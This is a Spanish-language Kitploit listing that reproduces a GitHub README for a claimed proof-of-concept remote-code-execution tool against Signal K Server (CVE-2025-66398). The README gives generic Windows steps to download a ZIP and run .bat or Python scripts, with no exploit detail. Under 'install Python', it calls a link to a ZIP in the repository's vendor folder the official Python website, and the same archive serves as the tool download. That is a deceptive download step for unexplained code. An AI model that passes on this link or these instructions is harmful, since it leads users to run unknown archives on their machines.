Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-66398 — Demostrar la explotación de Signal K Server CVE-2025-66398 que permite a atacantes no autenticados inyectar una puerta trasera y habilitar la ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/showy-headteacher114/cve-2025-66398
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubshowy-headteacher114/cve-2025-66398

cve-2025-66398

Demostrar la explotación de Signal K Server CVE-2025-66398 que permite a atacantes no autenticados inyectar una puerta trasera y habilitar la ejecución remota de código.

Ver Repositorio
13hace 1 díaAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

⚠️ cve-2025-66398 - Herramienta simple de prueba de concepto de RCE

Download


⚙️ Acerca de esta herramienta

Este proyecto demuestra una vulnerabilidad de ejecución remota de código (RCE) en Signal K Server versiones 2.18.0 y anteriores. La prueba de concepto (PoC) muestra cómo un atacante podría ejecutar comandos en un dispositivo vulnerable.

Esta herramienta está diseñada para evaluadores de seguridad, administradores de sistemas o cualquier persona interesada en comprender este problema de seguridad. No requiere conocimientos previos de programación para ejecutarse, pero ayuda tener conocimientos básicos de navegación por computadora.


🖥️ Requisitos del sistema

  • Windows 10 o posterior
  • Al menos 2 GB de RAM libre
  • 100 MB de espacio libre en disco
  • Conexión a Internet para descargar archivos
  • NO se necesitan derechos de administrador

📥 Cómo descargar e instalar

Haga clic en el botón de abajo para visitar la página del proyecto y descargar los archivos.

Download

Paso 1: Visite la página de descarga

Vaya al enlace de arriba. Verá una lista de archivos y carpetas en la página de GitHub.

Paso 2: Descargue el archivo ZIP

Busque el botón verde Code cerca de la parte superior derecha de la página. Haga clic en él y seleccione Download ZIP.

Paso 3: Extraiga los archivos

  • Busque el archivo ZIP descargado en su carpeta de Descargas.
  • Haga clic derecho en el archivo ZIP y seleccione Extract All.
  • Elija una carpeta donde desee que vayan los archivos y luego haga clic en Extract.

Paso 4: Localice la aplicación

Abra la carpeta extraída. Debería ver archivos relacionados con el proyecto, como scripts y documentación.


▶️ Cómo ejecutar la herramienta en Windows

El proyecto utiliza scripts escritos en Python y Go. Para ejecutar la herramienta, usará una ventana simple de símbolo del sistema.

Paso 1: Abra el símbolo del sistema

  • Presione Win + R en su teclado.
  • Escriba cmd y presione Enter.

Paso 2: Navegue hasta la carpeta

Escriba este comando, reemplazando path\to\folder con la ruta de su carpeta extraída:

root@kitploit:~
cd path\to\folder

Presione Enter.

Paso 3: Ejecute el script

Puede encontrar un script con un nombre como run.bat o start.bat. Si es así, escriba su nombre y presione Enter. Por ejemplo:

root@kitploit:~
run.bat

Si no hay un archivo BAT, busque un script de Python que termine en .py. Necesitará tener Python instalado en su PC (consulte la siguiente sección).

Escriba este comando para ejecutarlo:

root@kitploit:~
python scriptname.py

Reemplace scriptname.py con el nombre real del archivo.


🐍 Instalación de Python (si es necesario)

Si recibe un error que dice que Python no está reconocido, necesita instalar Python.

Paso 1: Descargue Python

Vaya al sitio web oficial de Python:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

Haga clic en el instalador más reciente de Windows y descárguelo.

Paso 2: Instale Python

  • Ejecute el instalador descargado.
  • Marque la casilla que dice Add Python to PATH antes de hacer clic en Install Now.
  • Espere hasta que finalice la instalación.

Paso 3: Verifique la instalación de Python

Abra una nueva ventana del símbolo del sistema y escriba:

root@kitploit:~
python --version

Debería mostrar la versión de Python instalada.


🚨 Ejecutar la herramienta de forma segura

Esta herramienta es solo para probar y aprender sobre una vulnerabilidad específica. Úsela en un entorno seguro, como una red de pruebas o una máquina aislada.

Nunca la ejecute contra sistemas que no le pertenezcan o para los que no tenga permiso de prueba.


🔍 Cómo funciona la herramienta

La herramienta escanea dispositivos que ejecutan Signal K Server versión 2.18.0 o anterior. Intenta enviar comandos que explotan la vulnerabilidad y comprueba si el objetivo los ejecuta.

Esto permite a los profesionales de seguridad confirmar si sus sistemas son vulnerables y tomar medidas para actualizarlos o protegerlos.


💡 Solución de problemas

  • Si la herramienta no se inicia, verifique que se encuentre en la carpeta correcta en el símbolo del sistema.
  • Asegúrese de que Python esté instalado y agregado a su PATH del sistema.
  • Cierre otras aplicaciones que puedan bloquear el acceso a la red.
  • Ejecute el símbolo del sistema como Administrador si encuentra errores de permisos.
  • Asegúrese de que el dispositivo objetivo sea accesible en la red.

📄 Recursos adicionales

Para obtener más información sobre la vulnerabilidad CVE-2025-66398, busque en bases de datos de seguridad o en GitHub investigaciones relacionadas.


🔗 Enlace de descarga

Visite esta página para descargar los archivos de la herramienta:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

Descargar herramienta